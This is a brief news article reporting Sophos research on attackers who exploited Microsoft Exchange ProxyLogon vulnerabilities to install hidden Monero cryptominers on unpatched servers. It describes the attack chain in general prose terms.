Want To Become A Better Investor?
Yes, I Want To Make More Money
I Do Not Want To Make More Money.
As Microsoft released critical updates to their Exchange servers, several zero-day vulnerabilities were uncovered and detailed. Of course, threat actors immediately rushed to exploit these vulnerabilities. Cybercriminals jumped to the opportunity to take advantage of the servers that were left still unpatched. These criminal groups ranged from large hacking groups to ransomware gangs. In its research, Sophos reported that, besides a host of malware and ransomware attacks, there were also other payloads aimed at vulnerable servers. Some groups targeted the Microsoft Exchange servers with crypto mining malware to secretly use the processing power of unsuspecting targets.
Sophos’ cybersecurity experts have identified the crypto hackers taking advantage Microsoft Exchange Server ProxyLogon exploit. This way, they managed to install malicious Monero crypto miners on the Exchange servers. As they were inspecting the telemetry on one of their customers’ servers, Sophos’ researchers came across an “unusual attack”.
Server hardware is a pretty desirable target for cryptojacking. They usually carry a higher processing power and performance than desktops or laptops making them perfect for this sort of cyber attack. Thanks to the vulnerability, the hackers can scan the whole internet for unprotected machines. Once identified, those machines are added into the network and the money starts rolling for the attackers.
Monero is one of the favorite cryptocurrencies among these cybercriminals. It’s not valuable as Bitcoin, but it provides a higher level of anonymity. This is crucial for the attackers. The owner of the wallet, and actors behind the attack, are nearly impossible to trace. Also, it’s easier to mine.
According to Sophos, the Monero blockchain showed that the attacker’s wallet began receiving funds on March 9th. It was mere days after the servers’ vulnerabilities came to light. March 9 was the Patch Tuesday when Microsoft released the security updates for Exchange servers. So, the attackers were quick of the mark to exploit said vulnerabilities.
The attack was initiated with a PowerShell command. It retrieved a zip file from the Outlook Web Access logon path of a previously compromised server. The zip file contained a batch script that called on Windows to install two additional files that installed Monero miner. Per researchers, the executable involved a modified version of a tool, PEx64-Injector, which is publicly available on GitHub. This tool can migrate the x64 exe to any process while not requiring admin access. It temporarily installs the miner installer content to the file system.
The miner continues to run in memory while all the evidence of installation is deleted. However, the pools.txt file produced by the miner is temporarily written to the disk and reveals the address and password of the wallet. It also reveals that the attackers the name of the pool of miners, “DRUGS”.
The operators of the hijacked servers are unlikely to detect the issue of notice that the server has been hijacked by the Monero miner. As the hijackers don’t get greedy and use an excessive amount of processing power, they’re likely to go unnoticed. Microsoft has urged all organizations to urgently apply security updates to protect the network from these attacks.